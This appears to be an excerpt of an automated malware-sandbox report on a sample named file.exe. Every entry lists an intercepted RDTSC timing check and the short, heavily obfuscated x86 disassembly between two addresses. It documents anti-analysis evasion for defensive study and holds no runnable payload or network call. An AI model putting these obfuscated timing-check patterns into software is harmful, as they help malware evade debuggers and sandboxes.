Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0516 second address: 4EB051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB051A second address: 4EB0536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0536 second address: 4EB055B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 jmp 00007F423CC2AB1Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F423CC2AB1Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB055B second address: 4EB0578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0578 second address: 4EB057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB057C second address: 4EB0582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0582 second address: 4EB0588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0588 second address: 4EB058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED001B second address: 4ED0054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F423CC2AB1Fh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F423CC2AB27h 0x00000017 mov ecx, 3E26628Fh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED0054 second address: 4ED007F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F423D327E2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED02FA second address: 4ED0327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F423CC2AB1Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED0327 second address: 4ED032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED032D second address: 4ED0393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F423CC2AB23h 0x00000010 jmp 00007F423CC2AB23h 0x00000015 popfd 0x00000016 jmp 00007F423CC2AB28h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F423CC2AB20h 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push ebx 0x00000028 pop eax 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF06F3 second address: 4EF0708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0708 second address: 4EF0738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F423CC2AB21h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov esi, 270A7109h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0738 second address: 4EF076E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F423D327E34h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F423D327E37h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF076E second address: 4EF0786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423CC2AB24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0786 second address: 4EF078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF078A second address: 4EF0799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0799 second address: 4EF079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF079F second address: 4EF07A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF07A5 second address: 4EF07E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b jmp 00007F423D327E36h 0x00000010 mov eax, dword ptr [76FA65FCh] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F423D327E37h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF07E4 second address: 4EF07FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423CC2AB24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF07FC second address: 4EF0810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov ax, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0810 second address: 4EF0816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0816 second address: 4EF081A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF081A second address: 4EF0857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F42AEC5DC5Ah 0x0000000e jmp 00007F423CC2AB24h 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F423CC2AB27h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0857 second address: 4EF085F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF085F second address: 4EF08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor eax, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F423CC2AB23h 0x00000011 add ax, 42BEh 0x00000016 jmp 00007F423CC2AB29h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF08A1 second address: 4EF08CC instructions: 0x00000000 rdtsc 0x00000002 mov esi, 18C0A5A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a and ecx, 1Fh 0x0000000d jmp 00007F423D327E36h 0x00000012 ror eax, cl 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF08CC second address: 4EF08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF08D0 second address: 4EF08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF08D6 second address: 4EF08E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 667C9071h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF08E0 second address: 4EF0916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007F423D327E2Fh 0x00000010 pop esi 0x00000011 call 00007F423D327E39h 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0916 second address: 4EF091C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF091C second address: 4EF0958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00A32014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007F42418286A3h 0x00000026 push FFFFFFFEh 0x00000028 pushad 0x00000029 movzx esi, bx 0x0000002c movsx ebx, si 0x0000002f popad 0x00000030 pop eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F423D327E2Ch 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0958 second address: 4EF095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF095C second address: 4EF0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0962 second address: 4EF0968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0968 second address: 4EF096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF096C second address: 4EF09C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F424112B3C4h 0x00000010 mov edi, edi 0x00000012 jmp 00007F423CC2AB24h 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F423CC2AB1Eh 0x0000001f sbb cx, 51F8h 0x00000024 jmp 00007F423CC2AB1Bh 0x00000029 popfd 0x0000002a mov eax, 7D967B2Fh 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F423CC2AB20h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF09C6 second address: 4EF09E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, 7CEA7146h 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0035 second address: 4EA003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA003B second address: 4EA00A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F423D327E39h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F423D327E33h 0x00000017 and eax, 1A1C240Eh 0x0000001d jmp 00007F423D327E39h 0x00000022 popfd 0x00000023 popad 0x00000024 and esp, FFFFFFF8h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov bh, C1h 0x0000002c mov ax, 9E2Bh 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA00A2 second address: 4EA00A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA00A8 second address: 4EA010B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F423D327E32h 0x00000010 adc cx, 04E8h 0x00000015 jmp 00007F423D327E2Bh 0x0000001a popfd 0x0000001b mov ecx, 1E1E04DFh 0x00000020 popad 0x00000021 mov dword ptr [esp], ecx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F423D327E30h 0x0000002b or si, 1748h 0x00000030 jmp 00007F423D327E2Bh 0x00000035 popfd 0x00000036 mov ch, 5Eh 0x00000038 popad 0x00000039 push ebp 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d mov edi, esi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA010B second address: 4EA0153 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F423CC2AB28h 0x00000008 xor ch, FFFFFFD8h 0x0000000b jmp 00007F423CC2AB1Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 2EDD778Fh 0x00000018 popad 0x00000019 mov dword ptr [esp], ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F423CC2AB21h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0153 second address: 4EA018F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e jmp 00007F423D327E34h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F423D327E37h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA018F second address: 4EA0195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0195 second address: 4EA01F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F423D327E39h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov eax, 6A5B4AB3h 0x00000018 jmp 00007F423D327E38h 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 pushad 0x00000022 mov dx, si 0x00000025 call 00007F423D327E2Ah 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA01F3 second address: 4EA021D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 mov edi, 6179982Ch 0x0000000e pop ebx 0x0000000f mov ah, 39h 0x00000011 popad 0x00000012 mov dword ptr [esp], edi 0x00000015 jmp 00007F423CC2AB1Dh 0x0000001a test esi, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA021D second address: 4EA0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0223 second address: 4EA0229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0229 second address: 4EA022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA022D second address: 4EA0231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA0231 second address: 4EA02C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F42AF3A6202h 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 movsx edx, si 0x00000015 popad 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 mov bx, 8FD8h 0x00000025 popad 0x00000026 je 00007F42AF3A61FAh 0x0000002c jmp 00007F423D327E37h 0x00000031 mov edx, dword ptr [esi+44h] 0x00000034 jmp 00007F423D327E36h 0x00000039 or edx, dword ptr [ebp+0Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push edx 0x00000040 pop ecx 0x00000041 pushfd 0x00000042 jmp 00007F423D327E39h 0x00000047 adc eax, 219A0386h 0x0000004d jmp 00007F423D327E31h 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA02C8 second address: 4EA02CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA02CE second address: 4EA02D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA02D2 second address: 4EA031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e jmp 00007F423CC2AB1Fh 0x00000013 jne 00007F42AECA8EAFh 0x00000019 jmp 00007F423CC2AB26h 0x0000001e test byte ptr [esi+48h], 00000001h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F423CC2AB1Ah 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA031D second address: 4EA032C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E907C9 second address: 4E907EF instructions: 0x00000000 rdtsc 0x00000002 call 00007F423CC2AB29h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E907EF second address: 4E907F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E907F3 second address: 4E907F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E907F7 second address: 4E907FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E9099C second address: 4E909A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E909A2 second address: 4E90A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F423D327E32h 0x00000009 add esi, 04147728h 0x0000000f jmp 00007F423D327E2Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F423D327E38h 0x0000001b xor eax, 2CFAA988h 0x00000021 jmp 00007F423D327E2Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a sub ebx, ebx 0x0000002c jmp 00007F423D327E2Fh 0x00000031 test esi, esi 0x00000033 jmp 00007F423D327E36h 0x00000038 je 00007F42AF3AD793h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov ecx, ebx 0x00000043 jmp 00007F423D327E39h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90A46 second address: 4E90A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423CC2AB1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90A56 second address: 4E90AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 jmp 00007F423D327E36h 0x00000017 mov ecx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f call 00007F423D327E36h 0x00000024 pop esi 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90AA4 second address: 4E90AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90AAA second address: 4E90AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90AAE second address: 4E90B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F42AECB0403h 0x0000000e jmp 00007F423CC2AB26h 0x00000013 test byte ptr [76FA6968h], 00000002h 0x0000001a pushad 0x0000001b mov dh, ah 0x0000001d mov edi, 7ECA515Eh 0x00000022 popad 0x00000023 jne 00007F42AECB03EAh 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F423CC2AB1Eh 0x00000032 sbb cl, 00000028h 0x00000035 jmp 00007F423CC2AB1Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007F423CC2AB28h 0x00000041 or esi, 0644FC88h 0x00000047 jmp 00007F423CC2AB1Bh 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90B35 second address: 4E90B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90B3B second address: 4E90B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90B3F second address: 4E90B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F423D327E37h 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F423D327E36h 0x00000016 push eax 0x00000017 pushad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90B7D second address: 4E90BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F423CC2AB23h 0x0000000b add cl, FFFFFF8Eh 0x0000000e jmp 00007F423CC2AB29h 0x00000013 popfd 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F423CC2AB1Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90BC4 second address: 4E90BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
